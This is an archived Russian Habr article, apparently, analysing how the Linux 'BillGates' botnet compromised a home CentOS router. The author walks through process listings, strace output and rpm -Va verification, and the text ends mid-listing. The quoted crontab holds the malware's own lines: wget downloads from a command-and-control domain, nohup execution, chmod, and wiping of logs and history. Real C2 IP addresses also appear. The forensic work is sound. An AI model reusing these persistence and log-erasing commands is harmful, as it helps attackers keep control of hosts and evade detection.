{
	"id": "14035c0b-606d-44e6-97d1-b75eab0791c8",
	"created_at": "2026-04-06T01:29:52.354672Z",
	"updated_at": "2026-04-10T13:12:15.400269Z",
	"deleted_at": null,
	"sha1_hash": "b40690b5aa64a997e15007ad8094a99cc8d1c1dd",
	"title": "Исследуем Linux Botnet «BillGates»",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 235126,
	"plain_text": "Исследуем Linux Botnet «BillGates»\r\nBy ValdikSS\r\nPublished: 2014-02-26 · Archived: 2026-04-06 00:43:55 UTC\r\n26 мин\r\n88K\r\nНаписал мне вчера lfatal1ty, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит\r\nканал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и\r\nпосмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним\r\nнепотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd,\r\ncupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc:\r\nСкрытый текст\r\nroot 4741 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/sksapd\r\nroot 4753 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx\r\nroot 4756 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd\r\nroot 4757 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/kysapd\r\nroot 4760 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/ksapd\r\nroot 4764 0.0 0.0 41576 2268 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/atdd\r\nroot 4767 0.0 0.0 41576 2264 ? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/skysapd\r\nК сожалению, процессы не додумался скопировать\r\nhttps://habrahabr.ru/post/213973/\r\nPage 1 of 24\n\nНачальный анализ\r\nСначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована\r\nсистема. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее:\r\ncd /etc;./ksapdd\r\ncd /etc;./kysapdd\r\ncd /etc;./atddd\r\ncd /etc;./ksapdd\r\ncd /etc;./skysapdd\r\ncd /etc;./xfsdxd\r\n«Хмм, ладно», подумал я. Полез в root'овский crontab:\r\nСкрытый текст\r\n# crontab -e\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n# daemon's notion of time and timezones.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n# daemon's notion of time and timezones.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\nhttps://habrahabr.ru/post/213973/\r\nPage 2 of 24\n\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n# daemon's notion of time and timezones.\r\n#\r\n# Output of the crontab jobs (including errors) is sent through\r\n# email to the user the crontab file belongs to (unless redirected).\r\n#\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n…\r\n*/1 * * * * killall -9 nfsd4\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n# daemon's notion of time and timezones.\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\n…\r\n*/1 * * * * killall -9 profild.key\r\nhttps://habrahabr.ru/post/213973/\r\nPage 3 of 24\n\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n# Notice that tasks will be started based on the cron's system\r\n…\r\n*/1 * * * * killall -9 DDosl\r\n*/1 * * * * killall -9 lengchao32\r\n*/1 * * * * killall -9 b26\r\n*/1 * * * * killall -9 codelove\r\n*/1 * * * * killall -9 32\r\n*/1 * * * * killall -9 64\r\n*/1 * * * * killall -9 new6\r\n*/1 * * * * killall -9 new4\r\n*/1 * * * * killall -9 node24\r\n*/1 * * * * killall -9 freeBSD\r\n*/99 * * * * killall -9 kysapd\r\n*/98 * * * * killall -9 atdd\r\n*/97 * * * * killall -9 kysapd\r\n*/96 * * * * killall -9 skysapd\r\n*/95 * * * * killall -9 xfsdx\r\n*/94 * * * * killall -9 ksapd\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n# indicating with different fields when the task will be run\r\n# and what command to run for the task\r\n#\r\n# To define the time you can provide concrete values for\r\n# minute (m), hour (h), day of month (dom), month (mon),\r\n# and day of week (dow) or use '*' in these fields (for 'any').#\r\n…\r\n*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd\r\n*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd\r\n*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd\r\n*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd\r\n*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd\r\n*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx\r\n*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd\r\n*/120 * * * * cd /root;rm -rf dir nohup.out\r\nhttps://habrahabr.ru/post/213973/\r\nPage 4 of 24\n\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n…\r\n*/360 * * * * cd /etc;rm -rf dir atdd\r\n*/360 * * * * cd /etc;rm -rf dir ksapd\r\n*/360 * * * * cd /etc;rm -rf dir kysapd\r\n*/360 * * * * cd /etc;rm -rf dir skysapd\r\n*/360 * * * * cd /etc;rm -rf dir sksapd\r\n*/360 * * * * cd /etc;rm -rf dir xfsdx\r\n*/1 * * * * cd /etc;rm -rf dir cupsdd.*\r\n*/1 * * * * cd /etc;rm -rf dir atdd.*\r\n*/1 * * * * cd /etc;rm -rf dir ksapd.*\r\n*/1 * * * * cd /etc;rm -rf dir kysapd.*\r\n*/1 * * * * cd /etc;rm -rf dir skysapd.*\r\n*/1 * * * * cd /etc;rm -rf dir sksapd.*\r\n*/1 * * * * cd /etc;rm -rf dir xfsdx.*\r\n*/1 * * * * chmod 7777 /etc/atdd\r\n*/1 * * * * chmod 7777 /etc/cupsdd\r\n*/1 * * * * chmod 7777 /etc/ksapd\r\n*/1 * * * * chmod 7777 /etc/kysapd\r\n*/1 * * * * chmod 7777 /etc/skysapd\r\n*/1 * * * * chmod 7777 /etc/sksapd\r\n*/1 * * * * chmod 7777 /etc/xfsdx\r\n*/99 * * * * nohup /etc/cupsdd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/100 * * * * nohup /etc/kysapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/99 * * * * nohup /etc/atdd \u003e /dev/null 2\u003e\u00261\u0026\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Each task to run has to be defined through a single line\r\n…\r\n*/98 * * * * nohup /etc/kysapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/97 * * * * nohup /etc/skysapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/96 * * * * nohup /etc/xfsdx \u003e /dev/null 2\u003e\u00261\u0026\r\n*/95 * * * * nohup /etc/ksapd \u003e /dev/null 2\u003e\u00261\u0026\r\n*/1 * * * * echo \"unset MAILCHECK\" \u003e\u003e /etc/profile\r\n*/1 * * * * rm -rf /root/.bash_history\r\n*/1 * * * * touch /root/.bash_history\r\n*/1 * * * * history -r\r\n*/1 * * * * cd /var/log \u003e dmesg\r\n*/1 * * * * cd /var/log \u003e auth.log\r\n*/1 * * * * cd /var/log \u003e alternatives.log\r\n*/1 * * * * cd /var/log \u003e boot.log\r\n*/1 * * * * cd /var/log \u003e btmp\r\n*/1 * * * * cd /var/log \u003e cron\r\nhttps://habrahabr.ru/post/213973/\r\nPage 5 of 24\n\n…\r\n…\r\n*/1 * * * * cd /var/log \u003e cups\r\n*/1 * * * * cd /var/log \u003e daemon.log\r\n*/1 * * * * cd /var/log \u003e dpkg.log\r\n*/1 * * * * cd /var/log \u003e faillog\r\n*/1 * * * * cd /var/log \u003e kern.log\r\n*/1 * * * * cd /var/log \u003e lastlog\r\n*/1 * * * * cd /var/log \u003e maillog\r\n*/1 * * * * cd /var/log \u003e user.log\r\n*/1 * * * * cd /var/log \u003e Xorg.x.log\r\n*/1 * * * * cd /var/log \u003e anaconda.log\r\n*/1 * * * * cd /var/log \u003e yum.log\r\n*/1 * * * * cd /var/log \u003e secure\r\n*/1 * * * * cd /var/log \u003e wtmp\r\n*/1 * * * * cd /var/log \u003e utmp\r\n*/1 * * * * cd /var/log \u003e messages\r\n*/1 * * * * cd /var/log \u003e spooler\r\n*/1 * * * * cd /var/log \u003e sudolog\r\n*/1 * * * * cd /var/log \u003e aculog\r\n*/1 * * * * cd /var/log \u003e access-log\r\n*/1 * * * * cd /root \u003e .bash_history\r\n*/1 * * * * history -c\r\n…\r\n# Edit this file to introduce tasks to be run by cron.\r\n#\r\n# Edit this file to introduce tasks to be run by cron.\r\n# Edit this file to introduce tasks to be run by cron.\r\nОх. Размером он был 183КБ, 4036 строчек. Вы когда-нибудь видели crontab размером 183КБ? Я видел.\r\nК моменту, когда я зашел на сервер, эти процессы уже ничего не делали (не грузили процессор, не\r\nиспользовали сеть). Решил остановить crond, чтобы эти правила не выполнялись, а процессы пока не\r\nубивать. Натравил на них strace:\r\nСкрытый текст\r\n[root@Fatalsrv etc]# strace -p 3312\r\nProcess 3312 attached - interrupt to quit\r\n[ Process PID=3312 runs in 32 bit mode. ]\r\nrestart_syscall(\u003c... resuming interrupted call ...\u003e) = 0\r\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\r\nsetsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nfcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)\r\nfcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0\r\nconnect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr(\"116.10.189.246\")}, 16) = -1 EINPROGRES\r\nhttps://habrahabr.ru/post/213973/\r\nPage 6 of 24\n\nfcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)\r\nfcntl64(3, F_SETFL, O_RDWR) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35\"..., 401, 0) = -1 ECONNREFUSED (Connection refused)\r\nclose(3) = 0\r\nnanosleep({15, 0}, NULL) = 0\r\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\r\nsetsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nfcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)\r\nfcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0\r\nconnect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr(\"116.10.189.246\")}, 16) = -1 EINPROGRES\r\nfcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)\r\nfcntl64(3, F_SETFL, O_RDWR) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35\"..., 401, 0) = -1 ECONNREFUSED (Connection refused)\r\nclose(3) = 0\r\nnanosleep({15, 0},\r\n[root@Fatalsrv etc]# strace -p 3268\r\nProcess 3268 attached - interrupt to quit\r\n[ Process PID=3268 runs in 32 bit mode. ]\r\nrecv(3, 0xfff19338, 4, 0) = -1 ECONNRESET (Connection reset by peer)\r\nclose(3) = 0\r\nfutex(0x816e8a8, FUTEX_WAKE, 1) = 1\r\nfutex(0x816e8a4, FUTEX_WAKE, 1) = 1\r\nnanosleep({15, 0}, NULL) = 0\r\nsocket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3\r\nsetsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nfcntl64(3, F_GETFL) = 0x2 (flags O_RDWR)\r\nfcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK) = 0\r\nconnect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr(\"112.90.22.197\")}, 16) = -1 EINPROGRESS\r\nfcntl64(3, F_GETFL) = 0x802 (flags O_RDWR|O_NONBLOCK)\r\nfcntl64(3, F_SETFL, O_RDWR) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35\"..., 401, 0) = 401\r\nsetsockopt(3, SOL_SOCKET, SO_RCVTIMEO, \"\u003c\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nrecv(3, \"\\4\\0\\0\\0\", 4, 0) = 4\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nhttps://habrahabr.ru/post/213973/\r\nPage 7 of 24\n\nsend(3, \"\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\", 27, 0) = 27\r\nsetsockopt(3, SOL_SOCKET, SO_RCVTIMEO, \"\u003c\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nrecv(3, \"\\4\\0\\0\\0\", 4, 0) = 4\r\nsetsockopt(3, SOL_SOCKET, SO_SNDTIMEO, \"\\17\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nsend(3, \"\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\", 27, 0) = 27\r\nsetsockopt(3, SOL_SOCKET, SO_RCVTIMEO, \"\u003c\\0\\0\\0\\0\\0\\0\\0\", 8) = 0\r\nrecv(3, ^C \u003cunfinished ...\u003e\r\nProcess 3268 detached\r\nПроцессы почти ничего не делали, только изредка отправляли собранные с машины данные. Решил их\r\nубить, разумеется, с сигналом SIGKILL. Почистил crontab, почистил /etc/rc.local, удалил эти исполняемые\r\nфайлы из /etc (к слову, они все имели SUID-бит, а на одном был Immunity-бит, и если не знать или не\r\nпомнить про extended attributes файлов, то можно долго ломать голову, почему ничего нельзя с ним\r\nсделать: ни удалить, ни изменить), почистил /etc/profile от 422 строчек:\r\nunset MAILCHECK\r\nЧто означает, что ботнет был на компьютере примерно 7 часов. Не так много, но и не мало, заархивировал\r\nвсе файлы себе и скачал их.\r\nТеперь нужно проверить, были ли изменены какие-то системные файлы. В CentOS для этого достаточно\r\nвыполнить:\r\nrpm -Va\r\nВывод этой команды меня, в общем-то, порадовал:\r\nСкрытый текст\r\n[root@Fatalsrv ~]# rpm -Va\r\nS.5....T. c /etc/ppp/chap-secrets\r\nS.5....T. c /etc/issue\r\nS.5....T. c /etc/crontab\r\nS.5....T. c /etc/nagiosgraph/access.conf\r\nS.5....T. c /etc/nagiosgraph/nagiosgraph.conf\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/show.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showconfig.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showgraph.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showgroup.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showhost.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/showservice.cgi\r\n.M....... /usr/lib/nagiosgraph/cgi-bin/testcolor.cgi\r\n.M....... /usr/share/nagiosgraph/htdocs/nagiosgraph.css\r\n.M....... /usr/share/nagiosgraph/htdocs/nagiosgraph.js\r\nS.5....T. /var/log/nagiosgraph/nagiosgraph-cgi.log\r\nhttps://habrahabr.ru/post/213973/\r\nPage 8 of 24\n\nS.5....T. /var/log/nagiosgraph/nagiosgraph.log\r\nmissing /usr/java/jre1.7.0_40/lib/install.jar\r\n....L.... /lib/modules/2.6.32-358.2.1.el6.x86_64/build\r\nS.5....T. c /etc/tor/torrc\r\n.M....... /\r\n.......T. c /etc/ppp/options.pptpd\r\nS.5....T. c /etc/pptpd.conf\r\n....L.... c /etc/pam.d/fingerprint-auth\r\n....L.... c /etc/pam.d/password-auth\r\n....L.... c /etc/pam.d/smartcard-auth\r\n....L.... c /etc/pam.d/system-auth\r\nS.5....T. c /etc/rsyslog.conf\r\nS.5....T. c /etc/rc.d/rc.local\r\n..5....T. c /etc/sysctl.conf\r\nS.5....T. c /etc/vsftpd/vsftpd.conf\r\n.M....... /var/ftp/pub\r\n..5....T. c /etc/sysconfig/PlexMediaServer\r\n.......T. /usr/lib/plexmediaserver/start.sh\r\nS.5....T. c /etc/sysconfig/lm_sensors\r\nS.5....T. c /etc/php.ini\r\nS.5....T. c /etc/httpd/conf/httpd.conf\r\n.......T. /etc/rc.d/init.d/deluge-daemon\r\nS.5....T. c /etc/cacti/db.php\r\nS.5....T. c /etc/cron.d/cacti\r\nS.5....T. c /etc/httpd/conf.d/cacti.conf\r\n.M....... /usr/share/cacti\r\n.M....... /usr/share/cacti/about.php\r\n.M....... /usr/share/cacti/auth_changepassword.php\r\n.M....... /usr/share/cacti/auth_login.php\r\n.M....... /usr/share/cacti/cdef.php\r\n.M....... /usr/share/cacti/cmd.php\r\n.M....... /usr/share/cacti/color.php\r\n.M....... /usr/share/cacti/data_input.php\r\n.M....... /usr/share/cacti/data_queries.php\r\n.M....... /usr/share/cacti/data_sources.php\r\n.M....... /usr/share/cacti/data_templates.php\r\n.M....... /usr/share/cacti/gprint_presets.php\r\n.M....... /usr/share/cacti/graph.php\r\n.M....... /usr/share/cacti/graph_image.php\r\n.M....... /usr/share/cacti/graph_settings.php\r\n.M....... /usr/share/cacti/graph_templates.php\r\n.M....... /usr/share/cacti/graph_templates_inputs.php\r\n.M....... /usr/share/cacti/graph_templates_items.php\r\n.M....... /usr/share/cacti/graph_view.php\r\n.M....... /usr/share/cacti/graph_xport.php\r\n.M....... /usr/share/cacti/graphs.php\r\n.M....... /usr/share/cacti/graphs_items.php\r\nhttps://habrahabr.ru/post/213973/\r\nPage 9 of 24\n\n.M....... /usr/share/cacti/graphs_new.php\r\n.M....... /usr/share/cacti/host.php\r\n.M....... /usr/share/cacti/host_templates.php\r\n.M....... /usr/share/cacti/images\r\n.M....... /usr/share/cacti/images/arrow.gif\r\n.M....... /usr/share/cacti/images/auth_deny.gif\r\n.M....... /usr/share/cacti/images/auth_login.gif\r\n.M....... /usr/share/cacti/images/auth_logout.gif\r\n.M....... /usr/share/cacti/images/button_add.gif\r\n.M....... /usr/share/cacti/images/button_cancel.gif\r\n.M....... /usr/share/cacti/images/button_cancel2.gif\r\n.M....... /usr/share/cacti/images/button_clear.gif\r\n.M....... /usr/share/cacti/images/button_colapse_all.gif\r\n.M....... /usr/share/cacti/images/button_create.gif\r\n.M....... /usr/share/cacti/images/button_default.gif\r\n.M....... /usr/share/cacti/images/button_delete.gif\r\n.M....... /usr/share/cacti/images/button_expand_all.gif\r\n.M....... /usr/share/cacti/images/button_export.gif\r\n.M....... /usr/share/cacti/images/button_go.gif\r\n.M....... /usr/share/cacti/images/button_help.gif\r\n.M....... /usr/share/cacti/images/button_import.gif\r\n.M....... /usr/share/cacti/images/button_no.gif\r\n.M....... /usr/share/cacti/images/button_purge.gif\r\n.M....... /usr/share/cacti/images/button_refresh.gif\r\n.M....... /usr/share/cacti/images/button_save.gif\r\n.M....... /usr/share/cacti/images/button_view.gif\r\n.M....... /usr/share/cacti/images/button_yes.gif\r\n.M....... /usr/share/cacti/images/cacti_about_logo.gif\r\n.M....... /usr/share/cacti/images/cacti_backdrop.gif\r\n.M....... /usr/share/cacti/images/cacti_backdrop2.gif\r\n.M....... /usr/share/cacti/images/cacti_logo.gif\r\n.M....... /usr/share/cacti/images/calendar.gif\r\n.M....... /usr/share/cacti/images/delete_icon.gif\r\n.M....... /usr/share/cacti/images/delete_icon_large.gif\r\n.M....... /usr/share/cacti/images/disable_icon.png\r\n.M....... /usr/share/cacti/images/enable_icon.png\r\n.M....... /usr/share/cacti/images/enable_icon_disabled.png\r\n.M....... /usr/share/cacti/images/favicon.ico\r\n.M....... /usr/share/cacti/images/graph_page_top.gif\r\n.M....... /usr/share/cacti/images/graph_properties.gif\r\n.M....... /usr/share/cacti/images/graph_query.png\r\n.M....... /usr/share/cacti/images/graph_zoom.gif\r\n.M....... /usr/share/cacti/images/hide.gif\r\n.M....... /usr/share/cacti/images/install_icon.png\r\n.M....... /usr/share/cacti/images/install_icon_disabled.png\r\n.M....... /usr/share/cacti/images/left_border.gif\r\n.M....... /usr/share/cacti/images/menu_line.gif\r\nhttps://habrahabr.ru/post/213973/\r\nPage 10 of 24\n\n.M....... /usr/share/cacti/images/menuarrow.gif\r\n.M....... /usr/share/cacti/images/move_down.gif\r\n.M....... /usr/share/cacti/images/move_left.gif\r\n.M....... /usr/share/cacti/images/move_right.gif\r\n.M....... /usr/share/cacti/images/move_up.gif\r\n.M....... /usr/share/cacti/images/reload_icon_small.gif\r\n.M....... /usr/share/cacti/images/shadow.gif\r\n.M....... /usr/share/cacti/images/shadow_gray.gif\r\n.M....... /usr/share/cacti/images/show.gif\r\n.M....... /usr/share/cacti/images/tab_cacti.gif\r\n.M....... /usr/share/cacti/images/tab_console.gif\r\n.M....... /usr/share/cacti/images/tab_console_down.gif\r\n.M....... /usr/share/cacti/images/tab_graphs.gif\r\n.M....... /usr/share/cacti/images/tab_graphs_down.gif\r\n.M....... /usr/share/cacti/images/tab_mode_list.gif\r\n.M....... /usr/share/cacti/images/tab_mode_list_down.gif\r\n.M....... /usr/share/cacti/images/tab_mode_preview.gif\r\n.M....... /usr/share/cacti/images/tab_mode_preview_down.gif\r\n.M....... /usr/share/cacti/images/tab_mode_tree.gif\r\n.M....... /usr/share/cacti/images/tab_mode_tree_down.gif\r\n.M....... /usr/share/cacti/images/tab_settings.gif\r\n.M....... /usr/share/cacti/images/tab_settings_down.gif\r\n.M....... /usr/share/cacti/images/transparent_line.gif\r\n.M....... /usr/share/cacti/images/uninstall_icon.gif\r\n.M....... /usr/share/cacti/images/view_none.gif\r\n.M....... /usr/share/cacti/include\r\n.M....... /usr/share/cacti/include/auth.php\r\n.M....... /usr/share/cacti/include/bottom_footer.php\r\n.M....... /usr/share/cacti/include/global.php\r\n.M....... /usr/share/cacti/include/global_arrays.php\r\n.M....... /usr/share/cacti/include/global_constants.php\r\n.M....... /usr/share/cacti/include/global_form.php\r\n.M....... /usr/share/cacti/include/global_settings.php\r\n.M....... /usr/share/cacti/include/jscalendar\r\n.M....... /usr/share/cacti/include/jscalendar/calendar-setup.js\r\n.M....... /usr/share/cacti/include/jscalendar/calendar.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-af.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-al.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-bg.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-big5-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-big5.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-br.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ca.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-cs-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-cs-win.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-da.js\r\nhttps://habrahabr.ru/post/213973/\r\nPage 11 of 24\n\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-de.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-du.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-el.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-en.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-es.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-fi.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-fr.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-he-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-hr-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-hr.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-hu.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-it.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-jp.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ko-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ko.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-lt-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-lt.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-lv.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-nl.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-no.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-pl-utf8.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-pl.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-pt.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ro.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ru.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-ru_win_.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-si.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-sk.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-sp.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-sv.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-tr.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/calendar-zh.js\r\n.M....... /usr/share/cacti/include/jscalendar/lang/cn_utf8.js\r\n.M....... 